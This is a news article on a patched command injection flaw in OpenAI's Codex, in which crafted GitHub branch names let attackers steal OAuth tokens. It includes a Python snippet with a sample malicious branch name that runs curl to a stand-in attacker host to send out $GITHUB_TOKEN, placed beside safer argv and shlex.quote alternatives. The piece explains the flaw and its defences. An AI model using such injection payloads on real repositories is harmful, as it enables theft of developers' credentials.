‘Not just development tools’: Security experts discover critical flaw in OpenAI’s Codex which could compromise entire enterprise organizations



  • BeyondTrust Phantom Labs finds critical command injection flaw in OpenAI’s ChatGPT Codex
  • Vulnerability let attackers steal GitHub OAuth tokens via malicious branch names
  • OpenAI patched the flaw with stronger input validation, shell escaping, and token controls

Experts have claimed OpenAI’s ChatGPT Codex carried a critical command injection vulnerability that allowed threat actors to steal sensitive GitHub authentication tokens.

This is according to BeyondTrust’s research department, Phantom Labs, whose work helped OpenAI identify and patch the flaw.
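To illustrate the class of bug described in the report — this is a hypothetical sketch, not Codex’s actual code — an untrusted branch name interpolated into a shell command string can break out of its quoting and run attacker-controlled commands, whereas passing the name as a separate argument (or escaping it) keeps it inert:

```python
import shlex

# Hypothetical malicious branch name: the embedded quote and semicolons
# are the payload, styled after the attack class described above.
branch = 'feature"; curl https://attacker.example/?t=$GITHUB_TOKEN; echo "'

# UNSAFE: string interpolation into a shell command. The quote in the
# branch name terminates the argument, and the shell then executes the
# attacker's curl command with access to the environment's token.
unsafe_cmd = f'git checkout "{branch}"'

# SAFER: argv-style invocation (e.g. via subprocess.run with a list)
# never invokes a shell, so the branch name stays a single argument.
safe_argv = ["git", "checkout", branch]

# SAFER: if a shell string is unavoidable, escape with shlex.quote().
escaped_cmd = f"git checkout {shlex.quote(branch)}"
```

In the argv form the whole malicious string arrives at `git` as one literal argument, which git simply rejects as an invalid ref name rather than executing.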
